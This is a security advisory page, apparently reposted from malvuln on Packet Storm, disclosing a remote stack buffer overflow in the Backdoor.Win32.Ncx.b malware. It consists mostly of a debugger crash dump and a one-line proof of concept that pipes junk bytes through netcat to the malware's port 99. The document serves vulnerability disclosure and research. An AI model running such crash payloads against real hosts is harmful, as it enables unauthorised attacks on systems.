what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Backdoor.Win32.Ncx.b MVID-2021-0422 Buffer Overflow

Backdoor.Win32.Ncx.b MVID-2021-0422 Buffer Overflow
Posted Dec 13, 2021
Authored by malvuln | Site malvuln.com

Backdoor.Win32.Ncx.b malware suffers from a buffer overflow vulnerability.

tags | exploit, overflow
systems | windows
SHA-256 | 648a3e5d35f4b8732d0daf4bc29bbeee6f46a1d81aac5c053283a0c27e299f5b

Backdoor.Win32.Ncx.b MVID-2021-0422 Buffer Overflow

Change Mirror Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ncx.b
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can send a large junk payload and trigger a classic stack buffer overflow overwriting the EIP, ECX registers.
Type: PE32
MD5: 991c1f02c809cee860cb712896a45338
Vuln ID: MVID-2021-0422
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021

Memory Dump:
(f40.12a4): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000
eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???

0:003> .ecxr
eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000
eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:003> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe

FAULTING_IP:
Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555
00401555 88443418 mov byte ptr [esp+esi+18h],al

EXCEPTION_RECORD: 0314f9f4 -- (.exr 0x314f9f4)
ExceptionAddress: 00401555 (Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x00001555)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03150000
Attempt to write to address 03150000

PROCESS_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000008

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555
00401555 88443418 mov byte ptr [esp+esi+18h],al

FAILED_INSTRUCTION_ADDRESS:
+1555
41414141 ?? ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

IP_ON_HEAP: 027d0b40
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT: 0314fa44 -- (.cxr 0x314fa44)
eax=00000041 ebx=7745e250 ecx=5804cfad edx=0314fdc4 esi=00000144 edi=027d0b40
eip=00401555 esp=0314fea4 ebp=740a1e90 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x1555:
00401555 88443418 mov byte ptr [esp+esi+18h],al ss:002b:03150000=??
Resetting default scope

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 027d0b40 to 00401555

FRAME_ONE_INVALID: 1

STACK_TEXT:
0314fea4 00401555 backdoor_win32_ncx_b+0x1555
0314fea8 027d0b40 unknown!unknown+0x0


STACK_COMMAND: .cxr 000000000314FA44 ; kb ; dds 314fea4 ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: backdoor_win32_ncx_b+1555

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338

IMAGE_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe

DEBUG_FLR_IMAGE_TIMESTAMP: 34ae8eb9

BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ncx_b+1555

FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe!Unknown


Exploit/PoC:
python -c "print('A'*3306)" | nc64.exe MALWARE_HOST 99


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close